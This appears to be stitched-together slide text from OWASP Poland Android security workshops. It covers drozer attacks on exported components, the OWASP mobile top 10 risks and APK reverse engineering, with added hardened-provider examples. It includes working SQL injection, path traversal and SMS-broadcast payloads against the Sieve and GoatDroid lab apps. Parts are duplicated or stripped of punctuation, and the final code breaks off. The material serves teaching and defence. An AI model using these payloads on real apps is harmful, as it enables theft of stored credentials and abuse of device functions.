      com.mwr.example.sieve.FileSelectActivity
      com.mwr.example.sieve.MainLoginActivity
      com.mwr.example.sieve.PWList
    dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although they generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like Intents, files or the network stack).
Typical attacks: denial of service and information leakage
• Find exported services
• Launch them one by one with logcat running, to check for sensitive info
• Fire off Intents and wait
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app (granted the READ_SMS permission) can read SMS from the built-in SMS app's repository on our device
• What info can they hold?
– the user's phone numbers
– passwords
– SMS
• And one of the main problems is, again, permissions – providers exported without one:
    dz> run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database – just query it:
    dz> run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on authorization might include altering data, e.g. by using the app.provider.insert command
    dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
    dz> run scanner.provider.finduris -a com.mwr.example.sieve
    Accessible content URIs:
      content://com.mwr.example.sieve.DBContentProvider/Keys/
      content://com.mwr.example.sieve.DBContentProvider/Passwords
      content://com.mwr.example.sieve.DBContentProvider/Passwords/
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection (the provider splices the projection and selection it receives into its SQL)
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
    unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
    | Password         | pin  |
    | thisismypassword | 9876 |
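The two drozer queries above work because Sieve's provider concatenates the projection and selection it receives into its SQL. The Python below is an added example (not the workshop's code) that reproduces that construction against an in-memory SQLite stand-in, so you can watch the `* FROM Key--` payload dump the other table and the `'` probe produce the same „unrecognized token" error, next to the hardened variant: projection columns checked against an allow-list and the selection restricted to `<column> = ?` clauses whose values travel as bound parameters. The table layout and rows are constructed (Sieve's real schema is only hinted at by the drozer output).

```python
import re
import sqlite3

# Constructed stand-in for Sieve's database (the real schema is only hinted at by the drozer output).
ALLOWED_COLUMNS = {"_id", "service", "username", "password", "email"}   # the Passwords table
SAFE_CLAUSE = re.compile(r"(\w+) = \?")


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password TEXT, email TEXT);
        CREATE TABLE Key(Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES (1, 'Gmail', 'alice', 'zGq2h...', 'alice@example.com');
        INSERT INTO Key VALUES ('thisismypassword', '9876');
    """)
    return con


def vulnerable_query(con, projection, selection, selection_args=()):
    """How a ContentProvider.query() that concatenates its arguments ends up running attacker SQL."""
    proj = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM Passwords" % proj
    if selection:
        sql += " WHERE (%s)" % selection
    return con.execute(sql, selection_args).fetchall()


def hardened_query(con, projection, selection, selection_args=()):
    """Allow-list the projection; accept only '<column> = ?' clauses; values go in as bound parameters
    (on Android: SQLiteQueryBuilder with setProjectionMap()/setStrict(true) and selectionArgs)."""
    cols = list(projection) if projection else sorted(ALLOWED_COLUMNS)
    unknown = [c for c in cols if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError("unknown column(s): %s" % ", ".join(unknown))
    sql = "SELECT %s FROM Passwords" % ", ".join(cols)
    if selection:
        for clause in selection.split(" AND "):
            m = SAFE_CLAUSE.fullmatch(clause)
            if m is None or m.group(1) not in ALLOWED_COLUMNS:
                raise ValueError("selection must be '<column> = ?' clauses joined by AND")
        sql += " WHERE (%s)" % selection
    return con.execute(sql, selection_args).fetchall()


def demo():
    con = make_db()
    out = {}
    # 1) drozer --projection "* FROM Key--": the whole Key table comes back through the Passwords URI
    out["vuln_projection"] = vulnerable_query(con, ["* FROM Key--"], None)
    # 2) drozer --selection "'": the SQL error leaks the query shape
    try:
        vulnerable_query(con, None, "'")
        out["vuln_selection_error"] = None
    except sqlite3.OperationalError as e:
        out["vuln_selection_error"] = str(e)
    # 3) the hardened provider rejects both payloads but still serves a legitimate query
    out["hardened_rejected"] = []
    for proj, sel in ((["* FROM Key--"], None), (None, "'")):
        try:
            hardened_query(con, proj, sel)
            out["hardened_rejected"].append(False)
        except ValueError:
            out["hardened_rejected"].append(True)
    out["hardened_ok"] = hardened_query(con, ["username", "email"], "service = ?", ("Gmail",))
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

Bound parameters alone do not fix the projection: the column list is SQL syntax, not a value, which is why the hardened version needs the allow-list as well as the parameterised selection.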
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
    dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    127.0.0.1 localhost
    dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
    Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as „battery low", „boot completed", „headset plugged in", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the Intent and enjoy
Broadcast receivers attacks
    <receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
        <intent-filter>
            <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
        </intent-filter>
    </receiver>
    …
    <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid (the intent-filter makes the receiver exported, and no android:permission guards it)
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        Bundle bundle = arg1.getExtras();
        // the number and the text come straight from the Intent extras; nothing checks who sent them
        sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }
Any app can now make GoatDroid send an SMS on its behalf:
    dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for app components
Applies to all the above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the component)
• Limiting access with a permission (android:permission on the component), either a platform one such as RECEIVE_SMS or a custom one; a custom permission must use protectionLevel="signature", because a normal-level permission is granted to any app that asks for it
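Everything above about exported components, intent-filters, android:debuggable and permission protection levels comes down to reading AndroidManifest.xml (apktool d gives you the decoded one; drozer's app.package.manifest prints it). The Python below is an added example, not code from the workshop, that applies those rules mechanically: a component is exported if the attribute says so, or by default when it declares an intent-filter; a provider without the attribute is exported by default only when minSdkVersion is below 17; a component guarded by a custom permission of protectionLevel normal or dangerous is effectively open, since any app can request such a permission. The manifest it parses is constructed for the demo, loosely modelled on GoatDroid's SendSMSNowReceiver from the slide; the other component and permission names are assumptions.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"   # prefix of every android:* attribute
COMPONENTS = ("activity", "service", "receiver", "provider")

# Constructed manifest (loosely modelled on GoatDroid; names are assumptions, not the real file).
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.owasp.goatdroid.fourgoats">
    <uses-permission android:name="android.permission.SEND_SMS" />
    <permission android:name="org.owasp.goatdroid.fourgoats.SOCIAL" android:protectionLevel="normal" />
    <application android:debuggable="true">
        <activity android:name=".activities.Login">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name=".activities.AdminOptions" android:exported="true" />
        <activity android:name=".activities.Settings" android:exported="false" />
        <receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
            <intent-filter>
                <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
            </intent-filter>
        </receiver>
        <provider android:name=".providers.Profiles"
                  android:authorities="org.owasp.goatdroid.fourgoats.profiles" android:exported="true" />
        <service android:name=".services.Sync" android:permission="org.owasp.goatdroid.fourgoats.SOCIAL">
            <intent-filter><action android:name="org.owasp.goatdroid.fourgoats.SYNC" /></intent-filter>
        </service>
    </application>
</manifest>
"""


def is_exported(component, kind):
    """Manifest rules: explicit android:exported wins; otherwise an intent-filter exports the
    component; a provider with neither is exported only when minSdkVersion < 17 (reported as None)."""
    attr = component.get(A + "exported")
    if attr is not None:
        return attr == "true", "android:exported attribute"
    if component.find("intent-filter") is not None:
        return True, "intent-filter present (exported by default)"
    if kind == "provider":
        return None, "no attribute (exported by default only when minSdkVersion < 17)"
    return False, "default"


def analyze_manifest(xml_text):
    root = ET.fromstring(xml_text)
    app = root.find("application")
    # Custom permissions declared by the app and their protection levels (unset means "normal").
    declared = {p.get(A + "name"): p.get(A + "protectionLevel", "normal")
                for p in root.findall("permission")}
    report = {"debuggable": app.get(A + "debuggable") == "true", "components": [], "issues": []}
    if report["debuggable"]:
        report["issues"].append("android:debuggable=true: anyone with adb access can run-as the app "
                                "and attach a debugger")
    for kind in COMPONENTS:
        for c in app.findall(kind):
            name = c.get(A + "name")
            exported, why = is_exported(c, kind)
            perm = c.get(A + "permission")
            report["components"].append({"type": kind, "name": name, "exported": exported,
                                         "why": why, "permission": perm})
            if exported is False:
                continue
            reach = "is" if exported else "may be"
            launcher = any(a.get(A + "name") == "android.intent.action.MAIN" for a in c.iter("action"))
            if perm is None and not launcher:
                report["issues"].append("%s %s %s reachable by any app (%s) and requires no permission"
                                        % (kind, name, reach, why))
            elif perm is not None:
                level = declared.get(perm)
                if level is not None and level.split("|")[0] in ("normal", "dangerous"):
                    report["issues"].append("%s %s is guarded by %s with protectionLevel=%s, which any "
                                            "app can request; use signature" % (kind, name, perm, level))
    return report


def demo():
    return analyze_manifest(SAMPLE_MANIFEST)


if __name__ == "__main__":
    r = demo()
    for c in r["components"]:
        print("%-8s %-45s exported=%-5s (%s)" % (c["type"], c["name"], c["exported"], c["why"]))
    for issue in r["issues"]:
        print("ISSUE:", issue)
```

The list of exported components is the same one drozer's app.activity.info / app.service.info / app.provider.info / app.broadcast.info produce from the live device, so running this on the decoded manifest first tells you what to point drozer at.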
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler on the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten
  – Closed-source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open-source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali files
Demo
Android Manifest
Sample manifest file. Note the following:
• Permissions
  <uses-permission android:name="string" />
  <permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
Example component attributes (Activities, Services, Content providers, Broadcast receivers)
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested action/data.
  Intent intent = new Intent(Intent.ACTION_VIEW);
  intent.setData(Uri.parse("http://www.google.com"));
  String pack = "com.android.browser";
  ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
  intent.setComponent(comp);
  startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC - the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
  dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse together with adb, so it is enough to just „click-and-play”
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with intents it is possible to achieve the following:
  – Modify data in the background
  – Trick the user
  – Leak sensitive information
Activity components attacks
• General hijacking scheme
[diagram: general hijacking scheme between apps A, B and E]
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
• Although services generally don't seem dangerous, they could potentially perform sensitive operations
• To attack a service one needs interaction (it must be exported or respond to/accept input from message formats like intents, files or the network stack)
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat running to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems are, again, permissions
  dz> run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database
  – Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
  dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys/
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
  | Password | pin |
  | thisismypassword | 9876 |
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
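One provider hardened against the three attacks shown above (open query, SQL injection through projection or selection, path traversal through a file-backed URI), as an added example that is neither Sieve's nor the workshop's code; the table and column names, the backup directory and the class names are assumptions.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

// Added example, not Sieve's code. It still needs android:exported="false"
// or an android:permission in the manifest; nothing below replaces that.
public class HardenedProvider extends ContentProvider {
    private static final String TABLE = "Passwords";                 // assumed schema
    // Whitelist of columns a caller may project. "password" is deliberately
    // absent, and "* FROM Key;--" is not a key, so SQLiteQueryBuilder raises
    // IllegalArgumentException instead of reading another table.
    private static final Map<String, String> PROJECTION = new HashMap<>();
    static {
        PROJECTION.put("_id", "_id");
        PROJECTION.put("service", "service");
        PROJECTION.put("username", "username");
    }

    private static final class Db extends SQLiteOpenHelper {
        Db(Context c) { super(c, "database.db", null, 1); }
        @Override public void onCreate(SQLiteDatabase db) {
            db.execSQL("CREATE TABLE " + TABLE
                    + " (_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password BLOB)");
        }
        @Override public void onUpgrade(SQLiteDatabase db, int oldV, int newV) { }
    }
    private Db helper;

    @Override public boolean onCreate() { helper = new Db(getContext()); return true; }

    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables(TABLE);
        qb.setProjectionMap(PROJECTION);   // unknown column names are rejected
        qb.setStrict(true);                // selection is parsed and checked before use
        return qb.query(helper.getReadableDatabase(), projection, selection,
                selectionArgs, null, null, sortOrder);
    }

    // Path traversal defence: resolve the requested name inside one fixed
    // directory and refuse anything whose canonical path escapes it.
    private static final String BACKUP_DIR = "/data/data/com.example.app/files/backup"; // assumed

    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        if (!"r".equals(mode)) throw new FileNotFoundException("read-only provider");
        String name = uri.getLastPathSegment();
        if (name == null || name.isEmpty()) throw new FileNotFoundException("no file name");
        File root = new File(BACKUP_DIR);
        File requested = new File(root, name);
        try {
            String canonical = requested.getCanonicalPath();
            if (!canonical.startsWith(root.getCanonicalPath() + File.separator)) {
                throw new FileNotFoundException("path escapes backup directory");
            }
        } catch (IOException e) {
            throw new FileNotFoundException("cannot resolve path");
        }
        return ParcelFileDescriptor.open(requested, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    // app.provider.insert / update / delete have nothing to alter here.
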